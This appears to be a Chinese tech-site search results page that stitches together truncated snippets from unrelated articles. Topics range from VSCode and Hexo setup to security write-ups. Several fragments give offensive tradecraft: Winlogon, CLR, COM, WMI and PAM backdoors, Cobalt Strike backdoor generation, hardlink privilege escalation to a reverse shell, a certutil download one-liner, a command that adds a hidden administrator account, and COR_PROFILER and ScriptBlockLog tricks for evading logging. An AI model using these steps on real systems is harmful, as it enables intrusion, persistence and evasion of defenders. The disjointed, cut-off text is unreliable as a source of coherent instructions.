1.新建一个文件 2.右下角点击纯文本 3.选择想要创建的响应的文件,此处输入html 4.然后输入!...按tab就行了 5.如果要在VScode中运行html需要在插件里下载一个open in browser的插件,然后到代码页面右键找到运行就行了 发布者:全栈程序员栈长,转载请注明出处:https:/
最主要的问题在于:我需要用到外部依赖 gecode ,对于 win 10 ,经验告诉我,从源码编译来安装并不是一个好的选择,从官网下载 .msi 安装包再配合 VC++ 是明智之举。...自动完成「编译->链接->运行C++文件」流程?...(污染系统环境,且我们不可能每应用一个外部依赖,就修改一次系统环境,遂放弃) 用 shell 来集成这些命令 于是就有了 test.ps1 : $filename = main if ($args.Count...有几点需要注意: ` 是用来换行的 执行编译出的可执行文件需要用 sudo ,这很迷,我做了一点笔记[2]。 如何使用?...当我有一个脚本 abc.cpp ,我只需要在命令行输入 test abc 就可以自动 编译->链接->运行C++文件abc.cpp了!
思科Talos安全团队最近发现一款Powershell恶意程序,用DNS进行双向通信。 前言 DNS是企业网络中最常用的Internet应用层协议。...在这个特殊案例中,团队先分析了那段被当作VBScript文件提交到公共沙盒中的Powershell文件,他们将之称为为“第三阶段”。...文档用Document_Open()调用另一个VBA函数。这个VBA函数就会设置一个长字符串,其中包含一个Powershell命令和将执行的代码。...如果受感染系统用的是Powershell 3.0或者更高版本,第三阶段payload将写至“%PROGRAMDATA%\Windows\”中的ADS流文件中,并命名为“kernel32.dll”。...如上图所示,该恶意程序还在系统中创建了一个预定任务,任务名为“kernel32”,该任务关系到第三阶段payload储存于ADS还是注册表。
因为最近有数据需求,自己写了一个简单的小爬虫,但是这是第一版还是比较简陋,慢慢更新吧. ---- 能够实现的功能是查询英语单词和中文单词并且能够找出读音来,希望以后学习下图形界面再去完善下,整的好看点....data=data) data = response.json() means = data['dict_result']['simple_means']['symbols'][0]['parts'] 创建文件夹...if not os.path.exists("my_%s" % word): os.makedirs("my_%s" % word) dir_name = "my_%s" % word 用一个text...文件保存,文件名用单词名字 ''' flie_handler = open('%s.txt'%word,'w',encoding='utf-8') for item in means: flie_handler.write
Windows可以创建硬链接。简单地说(并且远非实际正确)解释,硬链接是另一个文件的副本,其中在副本上执行的任何文件传播到原始文件,反之亦然。...这意味着从具有编辑权限的C:\Windows\Internet Logs任何文件创建硬链接SYSTEM会将这些权限重置为系统中的任何用户都可以覆盖它的状态。这可以导致标准用户帐户的特权提升。...接下来,我们需要创建一个C:\Windows\Internet Logs到Google Update可执行文件的硬链接。...FuzzySecurity的PowerShell-Suite有一个方便的PowerShell脚本,可以NtSetInformationFile直接使用创建硬链接; Native-HardLink。...我选择用反向shell替换可执行文件,所以我们这样做,注销并重新SYSTEM进入,我们将获得一个具有访问权限的shell 。
Winlogon Helper DLL后门 Winlogon是一个Windows组件,用来处理各种活动,如登录、注销、身份验证期间加载用户配置文件、关闭、锁定屏幕等。...缺点就是需要留文件,并不方便。 注册表之CLR CLR全称为Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。...msf先生成一个web的监听,然后使用msf生成文件。...或者使用powershell无文件加载也是可以的。...如果是非管理员用户,用下面的方法修改注册表即可。
1、CMD 具体步骤如下: 1-1 创建一个批处理文件 比如:在系统的用户目录创建一个批处理文件 alias.bat 1-2 在批处理文件中,定义别名 使用关键字「 doskey 」定义别名,$*...,在地址栏中输入下面地址 计算机\HKEY_CURRENT_USER\Software\Microsoft\Command Processor 最后,选中 Command Processor 项右键,创建一个新的字符串值...(名称必须设置为 AutoRun,数值数据设定为上面创建的批处理文件的绝对路径) PS:如果 Command Processor 不存在,可以在「 Microsoft 项」上右键,创建一个新的项,名称设置为...所以我们需要针对 PowerShell 另外设置 Alias 具体步骤如下: 2-1 找到配置文件绝对路径 在 PowerShell 控制台中,输入命令「 echo $profile 」获取配置文件的完整路径...实战 | 如何用 Python 统计 Jira 数据并可视化 实战 | 如何用 Python 自动化监控文件夹完成服务部署!
思路是: 在服务器上搭建Git环境,创建Git仓库 在主机生成Hexo静态文件,通过与服务器连接,推到服务器上的Git仓库 通过git-hooks实现自动部署到网站资源目录 Nginx做静态文件服务器,...2.安装nginx和git yum install -y nginx git 3.Nginx服务器配置 通过宝塔面板可以方便地修改Nginx的配置文件,在taitres.cc的设置中找到配置文件,应该是自动配好了的...#在主机端打开powershell,cd到C:\Users\admin\.ssh生成密匙,如已有密匙可跳过这一步 ssh-keygen -t rsa -C "taitres.cc" # -t 指定密钥类型...,关闭终端,使用ssh git@server重新登录服务器,测试是否能不要密码登录到git用户,如出现Permission denied的问题可尝试文章末尾的解决办法 3.创建Git仓库 mkdir /...\下创建一个WindowsPowerShell文件夹,然后执行 New-Item -path $procos.ap-chongqing -type cos.ap-chongqing 就创建了一个Microsoft.PowerShell_procos.ap-chongqing.ps1
0x01 监听器Listner配置 首先是新增一个监听器,目前Cobaltstrike 4.2支持如下几种方式,具体作用介绍可以看这篇文章解释:监听器和基础设施管理 创建一个HTTP方式的监听器,点击保存...脚本,Powershell命令,Ruby,Raw,免杀框架Veli中的shellcode等等 Windows Excutable 该模块可以生成可执行Windows木马,此对话框生成Windows可执行文件...,如:exe,dll等。...0x03 上线windows主机 首先是生成一个windows类型的后门文件,这里监听器选择刚才生成http的方式,然后点击Generate生成后门exe文件 将生成的exe后门文件放入受害主机中运行...CrossC2.cna步骤主要是用来在 CobaltStrike 客户端直接生成后门文件用的,但是在windows上运行可能会遇到很多坑,所以建议还是直接在 CobaltStrike 服务端进行生成后门文件命令即可
(4) ProgramData C盘的一个系统文件夹(隐藏),它是公用的被创建文件夹或文件存放的地方,由创建者完整控制,程序运行或启动生成的临时文件通常存放该目录,电脑病毒也比较喜欢感染该目录。...(5) 用户 存放系统账号相关的文件或文件夹。在Web渗透中该目录有什么用呢?...shutdown -s -t 180 -c “你被黑了,系统马上关机”:设置关机,如果需要取消,则输入“shutdown -a” msg:用于系统命令弹框提示,比如输入msg administrator...常用来创建无线,比如“netsh wlan set hostednetwork mode=allow ssid=cc key=1122334455”。...批处理文件是DOS命令的组合文件,写在批处理文件的命令会被逐一执行,后缀名为“.bat”。比如创建一个批处理文件“x.bat”,包含3条DOS命令。 DIR查看已经已经创建成功。
WinRM 内存修补程序 在 PowerShell v3.0 上运行时,WinRM 服务存在一个错误,该错误会限制 WinRM 可用的内存量。...这些端口中的每一个都必须具有创建和配置的侦听器。...当主机是域的成员时,这是创建侦听器的最佳方法,因为配置是自动完成的,无需任何用户输入。有关组策略对象的更多信息,请参阅 组策略对象文档。 使用 PowerShell 创建具有特定配置的侦听器。...Ansible 可同时操作属于一个组的多台主机,组和主机之间的关系通过 inventory 文件配置。...: directory become: yes - debug: msg: "{{deploy.package_path}}" - name: 创建资源备份目录
在写脚本时,放到后台运行,想知道执行情况,会通过邮件、SMS(短信)、飞信、微信等方式通知管理员,用的最多的是邮件。...我们根据示例给自己发一个邮件测试下: 我这里测试使用本地的SMTP服务器,也就是要装一个支持SMTP协议的服务,比如sendmail、postfix等。...可以看到,多个收件人可以放到一个列表中进行群发。msg对象里From表示发件人,Subject是邮件标题,换行后输入的是邮件内容。 1.1 Python发送邮件并抄送 1 #!...s.sendmail(from_mail, to_mail+cc_mail, msg) 在这里注意下,收件人和抄送人为什么放一起发送呢?...先看下如何用email库构造一个简单的邮件: message = Message() message['Subject'] = '邮件主题' message['From'] = from_mail message
近期因为工控安全大赛的原因,遇到了32系统存在17-010用matesploit无法利用的缘故。...3. msf监听后门dll文件 用kali生成一个用于回连的dll文件,由于斗哥攻击者PC是win10带有kali子系统,所以lhost仍然是10.10.10.1,生成x86bind.dll文件后,将其复制到...0x03后渗透的一些利用 shell界面已经能做很多事情了,但很多时候需要获得更多权限,如得到服务器的远程桌面。 1.上传上兴远控后门 最直接想传一个后门文件上去,方便自己管理。...-urlcache -split -f [URL] output.file 实际测试过: win2K3,比如下载一个3389.bat,先成一个缓存文件Blob0_0.bin,在把这个文件重命名为3389...得到账号可以创建一个账号然后将其加入管理员组: net user reborn 123456 /add && net localgroup administrators reborn /add 或者hashdump
(先基于模板创建一台机器,模板在.json格式的配置文件中指定,然后以这个机器为基础自动化创建自定义镜像)Packer官网: https://developer.hashicorp.com/packer...developer.hashicorp.com/packer/plugins/builders/tencentcloud以Windows下的packer程序为例:1、下载packer压缩包并解压,直接用解压出来的可执行文件指定配置文件来打包镜像即可图片...Administrator", "ssh_password": "你的管理员密码", "ssh_timeout": "10m", "image_name": "PackerTest-shawyang-CC...创建Windows镜像,communicator不能选winrm①如果用windows公共镜像创建自定义镜像,communicator必须是none且json尾部不能有provisioners模块,并且虽然...Administrator", "ssh_password": "你的管理员密码", "ssh_timeout": "10m", "image_name": "PackerTest-shawyang-CC
与DLL劫持原理相近,但是COM组件的劫持目标不一定是一个进程,也可以是一个Windows API,劫持所需的文件不一定是一个DLL,它可以是一个.com文件、二进制PE文件、DLL文件。...如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制 参考:Use AppDomainManager to maintain persistence...> $filterName = 'BotFilter82' powershell> $consumerName = 'BotConsumer23' # 创建一个__EventFilter,用于设定触发条件...($fileContent)| set-content ("calcdllbase64.txt") 用变量$fileContent存储base64加密的calc.dll PowerShell> $fileContent...通过软连接的方式,实质上PAM认证是通过软连接的文件名(如: /tmp/su,/home/su)在/etc/pam.d/目录下寻找对应的PAM配置文件(如: /etc/pam.d/su),任意密码登陆的核心是
\Cmder.exe PSParentPath : Microsoft.PowerShell.Core\FileSystem::D:\devtools\cmder_mini 过滤文件 用Get-ChildItem...比方说,我现在想查找大于5kb的所有.md格式文件,那么就可以这么写。这里又用到了Powershell的一个方便的特性,文件大小单位,KB GB MB TB等单位都支持。...打开和关闭 首先,我们来创建一个Excel对象,这样实际上会创建一个Excel应用程序。...$workbook = $excel.Workbooks.Open("XXX.xlsx") 如果要创建一个新的工作簿,使用Add函数。...不过由于这种资料在网上面实在太少,我就算用谷歌搜索英文网页也搜不出来多少资料,大部分都属于一点小脚本。所以这里只能随便说说了。 首先准备一下数据,我准备了如图所示的数据。 ? 然后来创建一个图表对象。
$MyInvocation 包含一个对象,该对象具有有关当前命令(如脚本、函数或脚本块)的信息。...例如,可以在命令中使用此变量确定是否已创建某个配置文件: test-path $profile 也可以在命令中使用此变量创建配置文件: new-item -type file -path $pshome...Import-Clixml: 导入 CLIXML 文件,并在 Windows PowerShell 中创建相应的对象。...Measure-Object: 计算对象的数字属性以及字符串对象(如文本文件)中的字符数、单词数和行数。 more: 对结果分屏显示。 Out-File: 将输出发送到文件。...因此属性描述了一个对象是什么。 方法:可以使用这个对象做什么,比如切东西、当螺丝钉用、开啤酒盖。一个对象能干什么就属于这个对象的方法。
P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!...代码中使用Add-Type即时编译C#会使得文件落地,在编译阶段将一些*.cs放到临时目录中。...通过注册表(任何用户都可以) set COR_ENABLE_PROFILING=1 set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db} REG...有一个已知的公共绕过项目,可以禁用PowerShell的内置ScriptBlockLog机制。...要禁用它,我们只覆盖组策略设置的内存表示形式 用一个空的签名替换已知签名的字典:即使没有通过组策略启用脚本阻止日志记录机制,某些签名也会始终触发日志操作(原文如此!)。
还有一个更快捷的方法,因为密码最低就是8位的,我们用过strings方法把mdb用二进制文件的形式打开,然后只输出内容大于等于8的内容,在把这些内容输出成一个wordlist用来破解压缩文件。...密码: access4u@security 那接下来我们去解压压缩文件。 ? 解压成功!!! ? 我们用file看下这个.pst是什么文件 ? 是一个outlook的个人文件夹。...可以看到security的密码:4Cc3ssC0ntr0ller。我们用获得凭证去登陆telnet。 Security:4Cc3ssC0ntr0ller ? 登陆成功!...这里用nishang 这是一个基于Powershell的攻击框架,项目地址: https://github.com/samratashok/nishang。...这个就可以成为我们的利用点,但是用type获得信息杂乱无章,我们需用另一种方法来获得更为详细的整洁的输出。这里我们用script脚本的创建快捷方式实现。 1.
不同之处是,其可以调用整个dotNET的类型库,可以用面向对象的方式去访问和执行复杂的对象模型如Sqlserver的SMO、AMO模型和各种COM模型如OFFICE对象模型等。...手动实现方法-通过生成脚本任务来完成 上面说过,起码我们是懂得用界面、原生功能实现,才比较好理解如何用自动化实现,在SSMS上,我们可以通过【生成脚本】任务,实现数据库的元数据备份,具体操作见下图:...自动化备份数据元数据的方式,就是调用这个生成脚本的任务,让它每天都给我们备份出一个文件来即可。每天备份的频率,已经可以把我们的损失减少到一天内的工作。...C#代码如下:顺带写了自动删除过去60天外的脚本文件,防止备份数量过多。...一个小坑,不知道什么原因,使用PowerShell备份Azure SQL时报错,最终项目真实环境是用了C#生成的控制台程序,没有使用PowerShell脚本。
领取专属 10元无门槛券
手把手带您无忧上云